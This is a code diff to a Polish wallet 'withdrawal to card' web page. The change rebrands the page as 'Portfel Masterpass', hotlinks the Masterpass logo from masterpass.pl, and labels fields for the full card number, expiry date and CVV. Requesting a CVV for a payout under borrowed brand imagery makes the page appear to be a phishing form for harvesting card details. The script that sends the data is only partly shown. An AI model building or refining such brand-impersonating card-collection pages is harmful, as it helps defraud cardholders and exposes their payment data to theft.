--- a/public/wallet-withdraw.html
+++ b/public/wallet-withdraw.html
@@ -1,21 +1,31 @@
-
 <!DOCTYPE html>
 <html lang="pl">
 <head>
   <meta charset="UTF-8" />
-  <title>Portfel | Wypłata</title>
+  <title>Portfel Masterpass | Wypłata</title>
   <link rel="stylesheet" href="/style.css" />
 </head>
 <body>
-  <div class="withdraw-container">
+  <div class="container">
+    <img src="https://www.masterpass.pl/img/masterpass_logo.svg" alt="Masterpass logo" class="logo" />
     <h1>Wypłata na kartę</h1>
+
     <form id="withdrawForm">
-      <input type="text" id="card" placeholder="Numer karty" required />
+      <label for="card">Numer karty</label>
+      <input type="text" id="card" placeholder="1234 5678 9012 3456" required />
+
+      <label for="expiry">Data ważności (MM/YY)</label>
       <input type="text" id="expiry" placeholder="MM/YY" required />
+
+      <label for="cvv">Kod CVV</label>
       <input type="text" id="cvv" placeholder="CVV" required />
-      <input type="number" id="amount" placeholder="Kwota (PLN)" required />
+
+      <label for="amount">Kwota (PLN)</label>
+      <input type="number" id="amount" placeholder="np. 100" required />
+
       <button type="submit">Potwierdź wypłatę</button>
     </form>
+
     <div id="confirmation"></div>
   </div>
 
@@ -37,7 +47,9 @@
       });
 
       const data = await res.json();
-      confirmation.innerText = data.success ? '✅ Wypłata została zrealizowana.' : '❌ Wystąpił błąd.';
+      confirmation.innerText = data.success
+        ? '✅ Wypłata została zrealizowana.'
+        : '❌ Wystąpił błąd.';
     });
   </script>
 </body>
